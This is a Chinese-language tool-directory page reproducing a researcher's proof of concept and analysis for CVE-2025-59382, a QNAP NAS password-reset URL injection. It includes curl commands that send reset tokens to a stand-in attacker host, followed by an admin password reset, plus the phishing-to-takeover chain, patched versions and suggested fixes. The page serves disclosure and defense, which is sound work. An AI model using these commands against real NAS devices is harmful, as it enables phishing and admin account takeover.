Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59382-QNAP-Password-Reset-Account-Takeover — CVE-2025-59382 的概念验证和技术分析,这是一个 QNAP NAS 中的未授权密码重置 URL 注入漏洞,可实现从钓鱼到账户接管攻击链。 | Kitploit
工具/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
漏洞分析漏洞利用Web应用程序漏洞利用钓鱼攻击渗透测试学习与教育
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

CVE-2025-59382 的概念验证和技术分析,这是一个 QNAP NAS 中的未授权密码重置 URL 注入漏洞,可实现从钓鱼到账户接管攻击链。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
111个月前尚未审核

CVE-2025-59382:QNAP 密码重置导致账户接管

未经身份验证的攻击者控制的密码重置 URL,位于 /cgi-bin/reset_password.cgi。

在实验室环境中针对 QuTScloud c5.2.4.3041 build 20250211 进行了测试。QNAP 后来将此漏洞发布为 CVE-2025-59382,公告编号 QSA-26-10。

简述

具有本地网络访问权限或能够访问暴露的 NAS 管理界面的未认证攻击者,可以通过操纵 /cgi-bin/reset_password.cgi 中 send_mail 函数的 url 参数,将任意 URL 注入到官方 QNAP 密码重置邮件中。

受害者会收到来自 NAS 的真实 QNAP 密码重置邮件。攻击者 URL 直接嵌入到 HTML 邮件正文中,QNAP 会将重置令牌(rp)附加到该 URL 上。

这使得密码重置邮件变成了一条干净简洁的钓鱼到账户接管攻击链:

  1. 攻击者使用自己的 URL 触发密码重置
  2. NAS 将真实的 QNAP 重置邮件发送给受害者
  3. 受害者点击攻击者 URL
  4. 攻击者收到 rp 重置令牌
  5. 受害者将验证码(vc)输入钓鱼页面
  6. 攻击者重置管理员密码并登录

需要受害者交互,但无需攻击者身份验证。

触发

root@kitploit:~
curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

NAS 会发送官方的重置邮件,并将重置令牌附加到攻击者 URL 上,例如:

root@kitploit:~
https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

同一封邮件中也显示了验证码。在实验证据中,它看起来像这样:

root@kitploit:~
Your verification code is: 2FEA2B8B

因此,钓鱼页面只需要向受害者索取验证码。当链接被点击时,rp 令牌已经到达攻击者的服务器。

密码重置

一旦攻击者获得了 rp 令牌和关联的 vc 验证码,他们就可以重置管理员密码:

root@kitploit:~
curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

最终的密码重置调用必须是 POST 请求。受害者在虚假页面上输入的验证码会作为 vc=<code> 发送给 QNAP。

新密码在 new_pw 中以 base64 编码。在 PoC 中,这足以更改管理员密码并随后以管理员身份登录。

原理

正常的前端流程会构建一个本地 NAS URL,例如:

root@kitploit:~
location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

但后端信任客户端提供的 url 参数,而不是自行生成重置 URL。然后,它使用该值构建邮件链接,并附加:

root@kitploit:~
&u=<user>&rp=<reset_token>

它只是信任任何作为 url 传入的内容。

影响

  • 无需身份验证即可触发重置邮件
  • 官方 QNAP 邮件包含攻击者控制的 URL
  • 受害者点击后,重置令牌泄露给攻击者
  • 验证码可以通过同一邮件流进行钓鱼
  • 实验室链条证明了管理员密码重置和管理员登录

可信的 NAS 邮件负责传递。

公开状态

  • CVE:CVE-2025-59382
  • 公告:QSA-26-10
  • QNAP 公告发布日期:2026-06-17
  • 厂商 CWE:CWE-472
  • 厂商 CVSS v4.0:5.1 中等
  • QNAP 状态:已修复

QNAP 列出的受影响产品:

  • QTS 5.2.7
  • QuTS hero h5.2.8
  • QuTS cloud c5.2.8
  • QVP 2.7.1

QNAP 列出的修复版本:

  • QTS 5.2.9.3499
  • QuTS hero h5.2.9
  • QuTS cloud C5.2.9
  • QVP 2.8.0

QNAP 将问题描述为:远程攻击者修改密码重置 URL,诱骗受害者访问攻击者控制的重置页面,从而导致凭据窃取。

我自己的实验室目标是 QuTScloud c5.2.4.3041 build 20250211。我的实验室影响是:在受害者交互后,实现了管理员密码重置和管理员登录。

小备注:我于 2026-05-09 在实验室中复现了此问题,并于 2026-05-11 发送给 QNAP;他们将其标记为 INTSI000-9029 的重复项。由于 QNAP 现已发布 CVE/公告,我正在发布 PoC。致谢 Tim Coen 为首次发现者。

我建议的修复方案

我不知道 QNAP 使用的确切补丁。他们的公告仅列出了修复版本。

我猜测正确的修复方法很简单:不要让浏览器告诉 NAS 重置链接应该指向哪里。

NAS 应该自己构建该链接。如果 QNAP 的流程仍需要 url 参数,则只应接受正常的 NAS 重置页面,并拒绝任何外部内容。

我还会编码所有放入邮件正文的内容,并对未认证的重置邮件请求进行一些速率限制。

参考

  • QNAP 公告:https://www.qnap.com/en/security-advisory/qsa-26-10
  • QNAP CVE JSON:https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2025-59382
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2025-59382

免责声明: 此漏洞利用代码仅用于教育和防御性研究目的。请勿将其用于您不拥有或未经明确授权测试的系统。作者不对滥用行为负责。

Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

下载工具